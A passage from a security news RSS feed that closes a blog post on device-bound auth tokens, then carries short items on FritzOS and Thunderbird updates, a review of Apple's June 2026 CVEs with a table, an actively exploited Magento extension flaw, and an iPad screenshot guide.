flow doesn’t involve certificates, certificates can be used for device
registration in enterprise environments and you can make sure that auth
cookies only go to trusted devices. Unfortunately this is Chrome-only, and
so we’re going to need to wait for it to be backported to all the random app
frameworks for it to have widespread support on mobile or for almost
everyone’s desktop app that’s actually three websites in an Electron
wrapper. Mozilla’s <a class="link" href="https://github.com/mozilla/standards-positions/issues/912#issuecomment-4840591341" target="_blank" rel="noopener">current
position</a>
is that they’re not in favour of it, so I guess we’ll see where Safari lands
in terms of broad uptake.</p>
<p>The last thing on my list is <a class="link" href="https://datatracker.ietf.org/doc/draft-mw-oauth-tls-session-bound-tokens/04/" target="_blank" rel="noopener">another client cert/OAuth
binding</a>,
this one still in draft state at the time of writing. This one is aimed
primarily at the use of agent-driven tooling, where you have something
running in the background using a whole bunch of tools that are each acting
on your behalf. Authenticating to all of them separately isn’t a fun time,
but giving broadly scoped access tokens to a non-deterministic agent and
trusting that it’ll never post them somewhere public also isn’t a fun
time. The key distinction between it and RFC8705 is that it’s aimed at
<em>connections</em> rather than <em>sessions</em>, which avoids the worries about session
resumption. This is done with <a class="link" href="https://datatracker.ietf.org/doc/html/rfc5705" target="_blank" rel="noopener">TLS
Exporters</a>, which in TLS 1.3
should be unique to the connection even over session resumption (TLS 1.2 may
reuse some of the same key material for exporters over session resumption,
so it’s recommended to enforce 1.3 for this). By providing a new signature
alongside the cookie on every new connection, the client proves that it
still has access to the private key. This is a very new spec and I haven’t
had much time to work through it yet, but my naive understanding is that
unlike RFC8705 this would require some additional client support to be able
to regenerate the client signature on every TLS reconnection.</p>
<p>This doesn’t avoid all the problems that RFC8705 has, including how to scope
certificates. For the agentic use case that probably doesn’t matter - all
these tools are acting on behalf of the same user, it’s fine if all the
sites involved know they’re the same user. But it doesn’t solve the general
purpose user use case, and right now DBSC seems like the best we have there.</p>
<p>But. Part of me still wonders whether <a class="link" href="https://datatracker.ietf.org/doc/html/draft-balfanz-tls-obc-01" target="_blank" rel="noopener">Dirk
Balfanz’s</a>
approach was the right one. Yes, there’s risk associated with TLS session
resumption, but in the worst case you could just switch that off for high
risk setups. The cookie scope argument is real, and also in cases where it
could violate privacy the site owner could already choose to broaden their
cookie scope and violate your privacy, and in cases where it breaks things
you could just not make use of it. The other problems are largely fixed by
TLS 1.3, and then we’re just left with “Browsers handle client certificates
badly” to which my answer is “Yes, and we should fix that anyway”.</p>
<p>Despite having a pretty good answer to this solution over a decade ago, the
closest we have to actual deployment is something that offers strictly worse
security guarantees. And tokens keep getting stolen, and compromises keep
occurring, and for the most part people shrug and get on with things.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FritzOS 8.26 ist da: Neues Update behebt Internet-Probleme]]></title>
<description><![CDATA[Fritz startet neue Software-Aktualisierungen für ausgewählte Router-Modelle aus. Nutzer der FritzBox 4050 erhalten zahlreiche Funktionsverbesserungen, während für die Serie 7583 ein wichtiges Fehlerbehebungs-Update bereitsteht.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3639528/it-security-nachrichten/fritzos-826-ist-da-neues-update-behebt-internet-probleme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639528/it-security-nachrichten/fritzos-826-ist-da-neues-update-behebt-internet-probleme/</guid>
<pubDate>Wed, 01 Jul 2026 21:22:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159713.html"><img hspace="5" border="0" align="left" alt="Avm, Fritzbox, FritzOS, Fritz!box, Fritz!" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/45004.jpg"></a>
			Fritz startet neue Software-Aktualisierungen für ausgewählte Router-Modelle aus. Nutzer der <a href="https://winfuture.de/special/fritzbox/" title="FritzBox Special">FritzBox</a> 4050 erhalten zahlreiche Funktionsverbesserungen, während für die Serie 7583 ein wichtiges Fehlerbehebungs-Update bereitsteht.			(<a href="https://winfuture.de/news,159713.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 152.0.1 behebt Fehler bei EWS-Nachrichten]]></title>
<description><![CDATA[Mozilla hat Thunderbird 152.0.1 veröffentlicht. Das Update fällt klein aus und konzentriert sich auf Fehlerbehebungen sowie Sicherheitskorrekturen. Behoben wurde ein Problem, bei dem bei einigen EWS-Nachrichten (Exchange Web Services) mit mehreren Empfängern die Schaltfläche „Allen antworten“ nic...]]></description>
<link>https://tsecurity.de/de/3639345/it-nachrichten/thunderbird-15201-behebt-fehler-bei-ews-nachrichten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639345/it-nachrichten/thunderbird-15201-behebt-fehler-bei-ews-nachrichten/</guid>
<pubDate>Wed, 01 Jul 2026 19:48:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mozilla hat Thunderbird 152.0.1 veröffentlicht. Das Update fällt klein aus und konzentriert sich auf Fehlerbehebungen sowie Sicherheitskorrekturen. Behoben wurde ein Problem, bei dem bei einigen EWS-Nachrichten (Exchange Web Services) mit mehreren Empfängern die Schaltfläche „Allen antworten“ nicht angezeigt wurde. Nutzer...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-152-0-1-behebt-fehler-bei-ews-nachrichten/">Thunderbird 152.0.1 behebt Fehler bei EWS-Nachrichten</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The June 2026 Apple Security Update Review]]></title>
<description><![CDATA[We’re back with our look at the Apple macOS and iOS security updates. As this is a new feature for us, please let us know your feedback on the blog. For Jun 2026, Apple released 37 unique CVEs across iOS 26.5.2 / iPadOS 26.5.2, macOS Tahoe 26.5.2, Safari 26.5.2. Since Apple doesn’t provide CVSS s...]]></description>
<link>https://tsecurity.de/de/3638963/it-security-nachrichten/the-june-2026-apple-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638963/it-security-nachrichten/the-june-2026-apple-security-update-review/</guid>
<pubDate>Wed, 01 Jul 2026 17:25:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">We’re back with our look at the Apple macOS and iOS security updates. As this is a new feature for us, please let us know your feedback on the blog. </p><p class="">For Jun 2026, Apple released 37 unique CVEs across iOS 26.5.2 / iPadOS 26.5.2, macOS Tahoe 26.5.2, Safari 26.5.2. Since Apple doesn’t provide CVSS scores or other severity information, we’re left to speculate on which of these bugs is the most severe. The overwhelming majority (31 of 37) are WebKit/WebRTC bugs reachable through malicious web content. Most of those are crash/DoS bugs rather than code execution, so the real risk lives in the small set of kernel bugs and the handful of WebKit sandbox escapes. However, there are a couple that stand out.</p><p class="">-    <strong>CVE-2026-43724 (Kernel)</strong> – According to Apple, “An app may be able to cause unexpected system termination or write kernel memory.” A kernel memory write is the highest-value primitive here: it's the privilege-escalation half of a full exploit chain and leads to complete device control. The bug was credited to Hyunwoo Kim (@v4bel), who is known to be a serious kernel researcher. </p><p class="">-    <strong>CVE-2026-39868 (Kernel)</strong> – Another kernel bug, this one could “cause unexpected system termination or corrupt kernel memory.” This is kernel memory corruption, and notably credited to a roster of elite offensive researchers (STAR Labs, Positive Technologies, Baidu Security). This kind of attribution usually signals a weaponizable, possibly Pwn2Own-grade bug rather than a theoretical crash.</p><p class="">-    <strong>CVE-2026-43725 / CVE-2026-43701 (WebKit)</strong> – Apple states these bugs could allow a website to process restricted web content outside the sandbox. I'm flagging this sandbox-escape pair over the many WebKit crash bugs because a sandbox escape is the bridge that turns a web-content bug into a path toward the kernel issues above. It's the most dangerous remotely-triggered class in the release.</p><p class="">Here’s a look at all the bugs released by Apple this month:</p>





















  
  




  


  
    




<title>Apple Security Update – June 29, 2026</title>



  
    
      <span class="num">37</span><span class="lbl">Total CVEs</span>
      <span class="num">22</span><span class="lbl">Denial of Service</span>
      <span class="num">7</span><span class="lbl">Information Disclosure</span>
      <span class="num">3</span><span class="lbl">Memory Corruption</span>
      <span class="num">2</span><span class="lbl">Elevation of Privilege</span>
      <span class="num">2</span><span class="lbl">Sandbox Escape</span>
      <span class="num">1</span><span class="lbl">Spoofing</span>
    

    <table>
      <caption>Apple security release — June 29, 2026. "Yes/No" indicates whether each update is affected. CVE IDs link to NVD.</caption>
      <thead>
        <tr>
          <th>CVE ID</th>
          <th>Component</th>
          <th>Impact</th>
          <th class="center">iOS 26.5.2 / iPadOS 26.5.2</th>
          <th class="center">macOS Tahoe 26.5.2</th>
          <th class="center">Safari 26.5.2</th>
        </tr>
      </thead>
      <tbody>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43743" target="_blank" rel="noopener">CVE-2026-43743</a></td>
        <td>IOGPUFamily</td>
        <td class="impact">An app may be able to cause unexpected system termination</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39868" target="_blank" rel="noopener">CVE-2026-39868</a></td>
        <td>Kernel</td>
        <td class="impact">An app may be able to cause unexpected system termination or corrupt kernel memory</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43722" target="_blank" rel="noopener">CVE-2026-43722</a></td>
        <td>Kernel</td>
        <td class="impact">An app may be able to leak sensitive kernel state</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43724" target="_blank" rel="noopener">CVE-2026-43724</a></td>
        <td>Kernel</td>
        <td class="impact">An app may be able to cause unexpected system termination or write kernel memory</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43703" target="_blank" rel="noopener">CVE-2026-43703</a></td>
        <td>libxslt</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43706" target="_blank" rel="noopener">CVE-2026-43706</a></td>
        <td>libxslt</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43704" target="_blank" rel="noopener">CVE-2026-43704</a></td>
        <td>Web Extensions</td>
        <td class="impact">A malicious web extension may be able to cause an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39872" target="_blank" rel="noopener">CVE-2026-39872</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43663" target="_blank" rel="noopener">CVE-2026-43663</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43676" target="_blank" rel="noopener">CVE-2026-43676</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43699" target="_blank" rel="noopener">CVE-2026-43699</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43700" target="_blank" rel="noopener">CVE-2026-43700</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may disclose sensitive user information</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43701" target="_blank" rel="noopener">CVE-2026-43701</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may be able to process restricted web content outside the sandbox</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43705" target="_blank" rel="noopener">CVE-2026-43705</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to memory corruption</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43707" target="_blank" rel="noopener">CVE-2026-43707</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43708" target="_blank" rel="noopener">CVE-2026-43708</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may exfiltrate data cross-origin</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43709" target="_blank" rel="noopener">CVE-2026-43709</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43712" target="_blank" rel="noopener">CVE-2026-43712</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43713" target="_blank" rel="noopener">CVE-2026-43713</a></td>
        <td>WebKit</td>
        <td class="impact">Visiting a website may leak sensitive data</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43715" target="_blank" rel="noopener">CVE-2026-43715</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to memory corruption</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43716" target="_blank" rel="noopener">CVE-2026-43716</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43725" target="_blank" rel="noopener">CVE-2026-43725</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may be able to process restricted web content outside the sandbox</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43726" target="_blank" rel="noopener">CVE-2026-43726</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43727" target="_blank" rel="noopener">CVE-2026-43727</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43731" target="_blank" rel="noopener">CVE-2026-43731</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to memory corruption</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43732" target="_blank" rel="noopener">CVE-2026-43732</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may disclose sensitive user information</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43734" target="_blank" rel="noopener">CVE-2026-43734</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43735" target="_blank" rel="noopener">CVE-2026-43735</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may exfiltrate data cross-origin</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43740" target="_blank" rel="noopener">CVE-2026-43740</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may result in the disclosure of process memory</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43742" target="_blank" rel="noopener">CVE-2026-43742</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43745" target="_blank" rel="noopener">CVE-2026-43745</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43720" target="_blank" rel="noopener">CVE-2026-43720</a></td>
        <td>WebKit Canvas</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43721" target="_blank" rel="noopener">CVE-2026-43721</a></td>
        <td>WebKit Storage</td>
        <td class="impact">A malicious website may be able to silently hijack clipboard data</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28979" target="_blank" rel="noopener">CVE-2026-28979</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43717" target="_blank" rel="noopener">CVE-2026-43717</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43718" target="_blank" rel="noopener">CVE-2026-43718</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43746" target="_blank" rel="noopener">CVE-2026-43746</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      </tbody>
    </table>
  



  
  






  <p class="">We’ll continue these macOS updates if people find them useful. Stay tuned for the regularly schedule Patch Tuesday blog covering Adobe and Microsoft.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45247 in Mirasvit Full Page Cache Warmer aktiv ausgenutzt]]></title>
<description><![CDATA[Die kritische Schwachstelle CVE-2026-45247 erlaubt eine Remote Code Execution ohne Authentifizierung in der Mirasvit-Erweiterung „Full Page Cache Warmer“ für Magento 2. Ein manipuliertes serialisiertes PHP-Objekt im CacheWarmer-Cookie reicht für den Angriff aus. Die CISA hat die Schwachstelle als...]]></description>
<link>https://tsecurity.de/de/3638851/it-security-nachrichten/cve-2026-45247-in-mirasvit-full-page-cache-warmer-aktiv-ausgenutzt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638851/it-security-nachrichten/cve-2026-45247-in-mirasvit-full-page-cache-warmer-aktiv-ausgenutzt/</guid>
<pubDate>Wed, 01 Jul 2026 16:38:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die kritische Schwachstelle CVE-2026-45247 erlaubt eine Remote Code Execution ohne Authentifizierung in der Mirasvit-Erweiterung „Full Page Cache Warmer“ für Magento 2. Ein manipuliertes serialisiertes PHP-Objekt im CacheWarmer-Cookie reicht für den Angriff aus. Die CISA hat die Schwachstelle als aktiv ausgenutzt eingestuft, Version 1.11.12 behebt sie.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Screenshot on iPad: Every Method Explained (2026 Guide)]]></title>
<description><![CDATA[Taking a screenshot on an iPad is one of the quickest ways to save information, capture conversations, keep receipts, or share something on your screen. Apple offers multiple ways to take screenshots, including hardware buttons, Apple Pencil gestures, AssistiveTouch, and even voice commands. 



...]]></description>
<link>https://tsecurity.de/de/3638376/ios-mac-os/how-to-screenshot-on-ipad-every-method-explained-2026-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638376/ios-mac-os/how-to-screenshot-on-ipad-every-method-explained-2026-guide/</guid>
<pubDate>Wed, 01 Jul 2026 13:39:47 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Taking a screenshot on an iPad is one of the quickest ways to save information, capture conversations, keep receipts, or share something on your screen. Apple offers multiple ways to take screenshots, including hardware buttons, Apple Pencil gestures, AssistiveTouch, and even voice commands. 



This guide covers every method available on the latest versions of iPadOS, along with where your screenshots are saved and how to edit them.



No matter which iPad model you own, you can capture your screen in just a few seconds. After taking a screenshot, a small thumbnail appears in the lower-left corner. Tap it to crop, draw, add text with Markup, or share it instantly. If you ignore it, the screenshot saves automatically to the Photos app.



Table of contentsHow to Screenshot on iPad Without a Home ButtonHow to Screenshot on iPad With a Home ButtonHow to Screenshot on iPad Using Apple PencilHow to Screenshot on iPad Using AssistiveTouchHow to Screenshot on iPad Using SiriWhere Are Screenshots Saved on iPad?How to Take a Full-Page Screenshot on iPadFAQsSummaryConclusion



How to Screenshot on iPad Without a Home Button



Most recent iPad models, including newer iPad Pro, iPad Air, and iPad mini, do not have a Home button.



Press the Top button and either Volume button at the same time, then quickly release both buttons. The screen will flash, and a screenshot thumbnail will appear in the corner. Tap it to edit or swipe it away to save it automatically.




Open the screen you want to capture.



Press the Top button and Volume Up or Volume Down together.



Release both buttons immediately.



Tap the thumbnail to edit, or ignore it to save automatically.




How to Screenshot on iPad With a Home Button



If your iPad has a physical Home button, the process is slightly different.



Press the Top button and the Home button together, then release them quickly. The screenshot is captured and saved in Photos.




Open the page or app you want to capture.



Press the Top button and Home button at the same time.



Release both buttons.



Edit the screenshot if needed or let it save automatically.




How to Screenshot on iPad Using Apple Pencil



If your iPad supports Apple Pencil, you can capture the screen without pressing any buttons.



Simply place the Apple Pencil at either bottom corner of the display and swipe diagonally upward toward the center. The screenshot editor opens immediately, allowing you to annotate, crop, or highlight content before saving it.




Hold your Apple Pencil near either bottom corner.



Swipe diagonally upward.



Wait for the screenshot editor to open.



Make edits with Markup if needed.



Tap Done and save the screenshot.




How to Screenshot on iPad Using AssistiveTouch



If your buttons are damaged or you prefer on-screen controls, AssistiveTouch provides another option.



Enable AssistiveTouch from Settings &gt; Accessibility &gt; Touch &gt; AssistiveTouch. Once enabled, customize one of its actions to take a screenshot. You can then capture the screen with a simple tap on the floating AssistiveTouch button.




Open Settings.



Go to Accessibility.



Tap Touch.



Select AssistiveTouch and turn it on.



Assign Screenshot to a custom action.



Tap the floating button whenever you want to capture the screen.




How to Screenshot on iPad Using Siri



If your hands are busy, Siri can take a screenshot for you.



Activate Siri and say, "Take a screenshot." Siri captures the current screen, and the screenshot appears just like it does with the hardware buttons.




Activate Siri.



Say "Take a screenshot."



Wait for the screenshot to be captured.



Edit or save it as needed.




Where Are Screenshots Saved on iPad?



Every screenshot is stored automatically in the Photos app.



To find them:




Open Photos.



Tap Collections.



Scroll to Media Types.



Open the Screenshots album.




How to Take a Full-Page Screenshot on iPad



When capturing supported documents or webpages in Safari, you can save the entire page instead of only what is visible on the screen.



After taking the screenshot, tap the preview, choose Full Page, review the complete document, and save it as a PDF in the Files app.




Open the webpage or document.



Take a screenshot.



Tap the thumbnail preview.



Select Full Page.



Tap Done.



Save the PDF to the Files app.




FAQs



Why can't I take a screenshot on my iPad?



Check whether you're pressing the correct button combination. If that doesn't work, restart your iPad, make sure you have enough storage, and update to the latest version of iPadOS if an update is available.



Can I edit a screenshot immediately after taking it?



Yes. Tap the thumbnail that appears after you capture the screen. You can crop it, draw with Markup, add text, highlight important areas, or share it directly.



Does Apple Pencil work on every iPad?



No. The Apple Pencil screenshot gesture is available only on compatible iPad models that support Apple Pencil.



Can I take screenshots without using physical buttons?



Yes. You can use Apple Pencil, AssistiveTouch, or Siri to capture screenshots without pressing any hardware buttons.



Summary




Use the Top + Volume button on iPads without a Home button.



Use the Top + Home button on older iPads.



Swipe up from the bottom corner with Apple Pencil for a quick screenshot.



Turn on AssistiveTouch if you want on-screen screenshot controls.



Ask Siri to take a screenshot using a voice command.



Find all screenshots in the Photos app under the Screenshots album.



Save supported webpages as full-page PDFs from the screenshot editor.




Conclusion



Now you know every way to screenshot on iPad, whether you prefer hardware buttons, Apple Pencil, AssistiveTouch, or Siri. Each method works well for different situations, and all screenshots are easy to edit, share, and organize. Once you learn these shortcuts, capturing anything on your iPad becomes fast and effortless.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Patches Dozens of Vulnerabilities Across iOS, macOS, and Safari]]></title>
<description><![CDATA[The updates fix vulnerabilities in WebKit, the kernel, WebRTC, Web Extensions, and other components affecting iPhone, iPad, Mac, and Safari users.
The post Apple Patches Dozens of Vulnerabilities Across iOS, macOS, and Safari appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/3637992/it-security-nachrichten/apple-patches-dozens-of-vulnerabilities-across-ios-macos-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637992/it-security-nachrichten/apple-patches-dozens-of-vulnerabilities-across-ios-macos-and-safari/</guid>
<pubDate>Wed, 01 Jul 2026 11:37:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The updates fix vulnerabilities in WebKit, the kernel, WebRTC, Web Extensions, and other components affecting iPhone, iPad, Mac, and Safari users.</p>
<p>The post <a href="https://www.securityweek.com/apple-patches-dozens-of-vulnerabilities-across-ios-macos-and-safari/">Apple Patches Dozens of Vulnerabilities Across iOS, macOS, and Safari</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
